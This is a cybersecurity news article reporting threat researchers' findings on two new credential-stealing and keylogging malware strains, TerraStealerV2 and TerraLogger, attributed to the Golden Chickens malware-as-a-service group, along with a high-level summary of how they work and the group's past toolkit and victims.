A prolific malware-for-hire gang with ties to billion-dollar breaches has just dropped two new digital weapons designed to jack your passwords and loot your crypto wallets.
A notorious cybercriminal gang known for renting out malware to some of the most prolific hacking crews on the planet has released two new tools. The intent is crystal clear: steal your logins, drain your crypto, and watch every word you type.
Between January and April 2025, threat researchers at Insikt Group uncovered two new malware strains, TerraStealerV2 and TerraLogger.
Ten tracked samples of malware are tied to the Golden Chickens malware-as-a-service (MaaS) operation, also tracked as Venom Spider.
TerraStealerV2 is designed to harvest browser-stored credentials and cryptocurrency wallet data, while TerraLogger is a classic keylogger, quietly recording every keystroke on an infected machine.
They’re part of a new arsenal developed by Golden Chickens, a malware-as-a-service (MaaS) syndicate also known as Venom Spider. Both tools appear to be in early stages of development. They do not yet exhibit the level of stealth typically associated with Golden Chickens tooling.
“Given Golden Chickens’ history of developing malware for credential theft and access operations, these capabilities will likely continue to evolve,” write researchers.
How does the new malware work?
TerraStealerV2 targets the Chrome “Login Data” database to collect saved passwords and browser extension information.
However, it fails to bypass Application Bound Encryption (ABE), a Chrome security feature introduced in mid-2024 that encrypts credentials at the system level.
This suggests that the malware is either outdated or not yet production-ready. Once installed, it exfiltrates data through Telegram and a suspicious file transfer domain: wetransfers[.]io. The malware arrives on infected machines via multiple file formats, such as LNK, MSI, DLL, and EXE.
It also abuses legitimate Windows utilities like regsvr32.exe and mshta.exe to stay hidden. These tools, typically used for system administration or script execution, are frequently exploited to evade detection by endpoint protection platforms.
In contrast, TerraLogger functions as a standalone module. It sets a low-level hook to capture keystrokes and logs them locally. There’s no exfiltration component or command-and-control communication, making it likely a part of a modular payload meant to be paired with more sophisticated tools.
Who is Golden Chickens?
Golden Chickens has spent the past seven years building a reputation as a reliable malware vendor.
Since at least 2018, the group’s malware has been deployed by prolific threat actors like Russian-linked FIN6 and Cobalt Group, as well as Belarusian Evilnum. That trio alone is responsible for billions in damages from cyberattacks on airlines, retailers, and financial institutions globally.
Golden Chicken’s known toolkit ecosystem includes:
- VenomLNK: A malicious Windows shortcut file used for initial access
- TerraLoader: A malware loader for deploying additional payloads
- TerraTV: Designed to hijack TeamViewer sessions
- TerraCrypt: For ransomware deployment
- TerraRecon and TerraWiper: Reconnaissance and data destruction
- more_eggs: A backdoor malware
- Lite_more_eggs: a lite version of more_eggs used as a loader, written in JavaScript.
Tools developed by the Golden Chickens syndicate have been weaponized in several campaigns, including high-profile attacks on British Airways, Newegg, and Ticketmaster UK.
eSentire’s Threat Response Unit has tied Golden Chickens to a threat actor known as badbullzvenom, a persona believed to be jointly controlled by individuals based in Moldova and Montreal, Canada.
Your email address will not be published. Required fields are markedmarked